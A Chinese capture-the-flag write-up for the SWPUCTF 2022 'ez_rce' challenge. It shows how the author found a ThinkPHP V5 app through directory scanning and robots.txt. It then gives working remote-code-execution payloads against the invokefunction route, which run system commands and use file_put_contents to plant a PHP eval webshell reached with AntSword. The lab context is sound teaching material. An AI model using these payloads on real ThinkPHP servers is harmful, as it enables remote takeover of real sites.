当前位置: 首页 > news >正文

[SWPUCTF 2022 新生赛]ez_rce

news 来源:原创 2025/6/9 16:07:45

打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
在这里插入图片描述
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
在这里插入图片描述
然后访问:/NSS/index.php/
在这里插入图片描述
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。

payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

在这里插入图片描述

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)

在这里插入图片描述
再访问/NSS/shell.php
在这里插入图片描述
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)

在这里插入图片描述
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag
在这里插入图片描述

相关文章:

  • 前端基础知识
  • 蓝桥杯单片机组第十二届省赛第二批次
  • VMware中安装的ubuntu虚拟机屏幕由居中设置为最大化
  • Dify 工作流分类器技巧
  • LeetCode 热题100 2. 两数相加
  • JS高德地图实现降雨降雪效果
  • DeepSeek开源周Day1:FlashMLA引爆AI推理性能革命!
  • Java 登录框架
  • 模板方法模式
  • 数字信任的底层逻辑:密码学核心技术与现实应用
  • 计算机毕业设计SpringBoot+Vue.js墙绘产品展示交易平台(源码+文档+PPT+讲解)
  • [AI]从零开始的树莓派运行DeepSeek模型教程
  • C#开发——ConcurrentDictionary集合
  • 华为认证考试证书下载步骤(纸质+电子版)
  • docker安装register私库
  • 详解golang的Gengine规则引擎
  • 【排序算法】堆排序详解
  • 基于 SpringBoot 的 “电影交流平台小程序” 系统的设计与实现
  • 推送项目 之 解决冲突
  • Claude 3.7 Sonnet 泄露,Anthropic 最先进 AI 模型即将在 AWS Bedrock 上首次亮相
  • java购物网站开发教学视频/推广产品的方式有哪些
  • 网站建设服务商排名/网络营销的现状分析
  • 网站建设常规自适应/百度极速版免费下载安装
  • 网页设计与网站建设 倪宝童/seo教程seo教程
  • 做微商哪个网站有客源/优化大师 win10下载
  • 新建网站seo优化怎么做/百度关键词查询网站